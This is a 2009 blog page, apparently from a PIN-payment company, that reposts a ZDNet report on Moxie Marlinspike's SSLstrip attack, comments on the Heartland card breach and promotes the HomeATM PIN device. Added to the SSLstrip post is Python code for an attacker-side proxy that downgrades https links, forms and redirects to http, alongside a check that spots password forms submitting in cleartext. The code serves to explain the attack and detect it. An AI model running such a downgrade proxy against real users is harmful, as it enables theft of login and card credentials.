Friday, February 20, 2009

Researcher Demos SSL Attack (Still Can't Hack the PIN)

As the name implies, "browsers" are for "browsing." When you're done browsing and it comes time to make that online payment, it should be done "outside the browser."

I posted earlier this year (Browsers and E-Commerce Don't Mix, January 2nd, 2009) that researchers disclosed that a key piece of Internet technology that banks, e-commerce sites, and financial institutions rely on to keep transactions safe suffers from a serious security vulnerability.

They demonstrated how to forge security certificates used by secure Web sites, a process that would allow a sufficiently sophisticated criminal to fool the built-in verification methods used by all modern Web browsers--without the user being alerted that anything was amiss. 

They also said it was unlikely to affect most Internet users in the "near future" because taking advantage of the vulnerability requires discovering some techniques that "are not expected to be made public." 

Oh really...?  Well that's good news!   Oops!  Wanna watch the video on YouTube?  It's embedded at the end of this post... Note that the attack Marlinspike demonstrated needs none of those certificate-forging techniques: it never presents a forged certificate to the browser at all, because it keeps the victim on plain http and only the attacker's proxy speaks https to the real site.

Researcher demonstrates SSL attack
By Tom Espiner
Posted on ZDNet News: Feb 20, 2009

A security researcher has demonstrated a way to hijack Secure Sockets Layer (SSL) sessions to intercept login data.

Moxie Marlinspike, who spoke at the Black Hat security conference on Wednesday, explained how to subvert an SSL session by performing a man-in-the-middle attack. The anarchist researcher explained in a YouTube video that the attack uses a tool he developed, called SSLstrip, which exploits the interface between http and https sessions.

"SSLstrip man-in-the-middles all of the potential SSL connections on the network, specifically attacking the bridge between http and https," Marlinspike said in the video. (embedded at the end of this post)

Secure Sockets Layer, and its successor Transport Layer Security, are cryptographic protocols used to encrypt communications over TCP/IP networks. SSL and TLS are often used by banks and other organizations to secure web transactions.

The attack relies on users not directly calling up an SSL session by typing a URL into a browser. Most users initiate sessions by clicking on a button. These buttons are located on unencrypted http pages, and clicking on them will take users to encrypted https pages to log in.

"That opens up all kinds of avenues for ways that you might intercept [details]," Marlinspike said. In his Black Hat presentation, he claimed to have gathered details on 117 email accounts, seven PayPal logins and 16 credit card numbers, within a 24 hour period.

SSLstrip works by watching http traffic, then by acting as a proxy when a user attempts to initiate an https session. While the user believes the secure session has been initiated, and SSLstrip has connected to the secure server via https, all traffic between the user and SSLstrip is http. This means "disastrous warnings" displayed by browsers are avoided, as to the browser the session appears normal. Login details can then be harvested.

Marlinspike said that an https padlock logo can be spoofed in the URL bar, to further lull the user into a false sense of security.

While SSL is generally accepted as being secure, security researchers have claimed SSL communications can be intercepted.  In August last year, researcher Mike Perry said he had been in discussions with Google regarding an exploit he planned to release, which would allow a hacker to intercept a user's communications with supposedly secure websites over an unsecured Wi-Fi network.

This article was originally posted on
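The http-to-https "bridge" the article describes, as an added example that is not part of the original post, of the ZDNet article, or of SSLstrip itself. The proxy class plays the attacker's role from the description above: it rewrites every https link, form action and redirect it relays to the victim into http, remembers the real https URL so it can fetch from the bank over https, and the victim's browser never starts a TLS session of its own. The second half is the check a practitioner would want on the client side: a scan for a password form that would submit over cleartext, which is exactly what a stripped page looks like. The host name bank.example and the sample page and redirect are constructed for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit, urlunsplit

# Constructed sample traffic (bank.example is a placeholder, not a real site):
# an unencrypted landing page whose login link and form point at https URLs.
LANDING_PAGE = """<html><body>
<a href="https://bank.example/login">Log in</a>
<form action="https://bank.example/auth" method="post">
  <input name="user"><input name="pass" type="password">
</form>
</body></html>"""

# Constructed sample: the redirect a server sends a client that asked for
# the http version of a page that should be https.
REDIRECT = {"status": 302, "headers": {"Location": "https://bank.example/login"}}


class StripProxy:
    """Attacker-side proxy between victim and server: it talks https upstream
    and plain http downstream, keeping a map of the URLs it downgraded."""

    def __init__(self):
        self.downgraded = {}  # http URL handed to the victim -> real https URL

    def _downgrade(self, url):
        parts = urlsplit(url)
        if parts.scheme.lower() != "https":
            return url
        plain = urlunsplit(("http",) + tuple(parts[1:]))
        self.downgraded[plain] = url
        return plain

    def rewrite_body(self, html):
        """Rewrite every https:// link or form action in a relayed page."""
        return re.sub(r"https://[^\s\"'<>]+",
                      lambda m: self._downgrade(m.group(0)), html, flags=re.I)

    def rewrite_redirect(self, response):
        """Downgrade a Location header so the browser follows it over http."""
        headers = dict(response["headers"])
        if "Location" in headers:
            headers["Location"] = self._downgrade(headers["Location"])
        return {"status": response["status"], "headers": headers}

    def upstream_url(self, victim_url):
        """When the victim requests a downgraded URL, fetch the real https one."""
        return self.downgraded.get(victim_url, victim_url)


class _FormScanner(HTMLParser):
    """Collect (action, has_password_field) for every form on a page."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = [a.get("action") or "", False]
        elif tag == "input" and self._current is not None \
                and (a.get("type") or "").lower() == "password":
            self._current[1] = True

    def handle_endtag(self, tag):
        if tag == "form" and self._current is not None:
            self.forms.append(tuple(self._current))
            self._current = None


def cleartext_credential_forms(html, page_url):
    """Client-side check: return the actions of password forms whose submission
    would travel over http (a relative action inherits the page's scheme)."""
    scanner = _FormScanner()
    scanner.feed(html)
    page_scheme = urlsplit(page_url).scheme.lower()
    exposed = []
    for action, has_password in scanner.forms:
        if not has_password:
            continue
        scheme = urlsplit(action).scheme.lower() or page_scheme
        if scheme != "https":
            exposed.append(action)
    return exposed


if __name__ == "__main__":
    proxy = StripProxy()
    stripped = proxy.rewrite_body(LANDING_PAGE)
    print("victim sees:", stripped)
    print("proxy fetches:", proxy.upstream_url("http://bank.example/auth"))
    print("exposed forms:", cleartext_credential_forms(stripped, "http://bank.example/"))
```

The original page passes the check because its login form posts to https; the stripped copy fails it, which is the only signal the victim's browser has left once the padlock is gone.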


Citi Replacing Cards After Breach...but How Many?

According to the Press Association, Citigroup has started sending replacement credit cards to its customers, apparently in response to a massive security breach at Heartland Payment Systems.

"Heartland Payment Systems revealed that its system used to process Visa, MasterCard, American Express and Discover Card transactions was breached late last year.  The Princeton, New Jersey, company said the breach did not involve personal identification numbers (PINs)"

(Editor's Note:  Translation: they didn't get the PINs.  What if banks and V/MC had pushed the more secure "PIN debit" instead of pushing the less secure "signature debit"?  Sure, the excessive profits derived from higher interchange fees and the milking of $17 billion off consumers from overdraft charges were nice, but now it's kinda biting them in the *ss.  I guess there is a price to pay when self-interests are given priority over what's best in the long run.  What's best in the long run is security; at the end of the day, this dilemma has been exacerbated by their own self-serving modus operandi.

Earlier this week I posted that for every $100 of PIN-based transactions there was 1.09 cents of fraud.  Signature debit comes in at 5.4 cents.

It will be interesting to see how drastically those numbers shift after the final tally on how much this breach winds up costing. Don't expect anything too drastic; it wouldn't be in V/MC's best interest if those numbers become any more disparate.

Prediction 1: The new signature debit fraud numbers WILL NOT include costs associated with replacing cards and monitoring accounts...only the actual amounts of fraud committed using the breached card numbers. They want to keep these numbers as low as possible.

Prediction 2:  The PIN debit fraud numbers will always include every single penny derived from skimming, tampering, the use of cameras, people foolish enough to provide their PINs to scam artists, and if they could, they'd include ATM bombs.  V/MC will manipulate the data in order to skew these numbers to appear as high as possible, to keep people from questioning their mindset in pushing SigDebit over PINDebit.

Predilection 101: Visa and MasterCard will continue to push whatever makes them the most money.

Prediction 3:  Because of their aforementioned predilection, V/MC will be involved in yet another antitrust lawsuit, drag it on for as long as possible, and settle for about a third of what they wrongfully profited while they dragged it out over the years, on the morning the case is scheduled to begin.  OR...they will see the light of day and determine that their strategy won't hold up in the long term, and having learned from past mistakes, work with the other EFT networks (Visa owns Interlink/MC owns Maestro) and empower PIN debit instead of fraudsters.  Flip a coin.

So how many cards will Citi have to replace?  Citibank has not revealed how many of its customers are involved; however, Citi has more than 150 million credit card accounts worldwide.

Meanwhile...the number of banks across the US that have said their customers were involved in the Heartland breach and have issued new cards to consumers has climbed to 440+. The rest are still monitoring their systems for unusual activity to detect fraud.



HomeATM Plans On Participating in FinovateStartup09

HomeATM has committed to attend Finovate Startup '09 and plans on participating as one of the presenting companies as well.

To learn more about Finovate Startup '09 and Finovate '09 you may visit either or

HomeATM in the News


Heightened attention to data breaches tied to point-of-sale software and online shopping carts is bolstering a security-engineering company's argument that the use of PINs on the Internet can be done securely only using a payment card terminal that (easily) attaches to consumers' personal computers. (in milliseconds)

HomeATM ePayment Solutions, which is based in Montreal, is close to piloting a personal card-swipe device and PIN pad that consumers plug directly into a PC's USB port. The system requires no installation or software. When consumers check out at a participating merchant's Web site, the site prompts them to use the device to swipe their card and enter their PIN to complete a transaction. If a retailer conducts a successful pilot, the hardware will provide peace of mind for the consumer while turning card-not-present interchange rates to cheaper card-present rates for merchants, contends Kenneth Mages, HomeATM chairman and CEO. The company has an agreement with a major electronic funds network to begin the pilot, but first HomeATM wants to secure participation from a large, Tier 1 merchant, Mages says. Tier 1, or Level 1, merchants process more than 6 million transactions per year. The company is considering several merchants, including a major U.S.-based airline, which Mages declined to name. The device, called SafeTPIN, received Payment Card Industry Data Security Standard certification two weeks ago.

Editor's Note:
The headline can be a little misleading. We don't "PLAN TO TEST" the device.  We tested it already.  Rigorously!  But, in order to prove our results were objective, it was thoroughly tested by a fully accredited outside resource. This from the Witham Laboratories website:

One of only eight in the world…

Among our many certifications, Witham Laboratories is the only organization in the Asia-Pacific region accredited by the PCI to test PIN Entry Devices (PEDs) - we are one of only eight organizations in the world with this accreditation. So, do we plan to pilot the device...yes.  Do we plan on testing it?  Done.

For more information on the accreditation process, visit Witham Labs.

For more information visit:

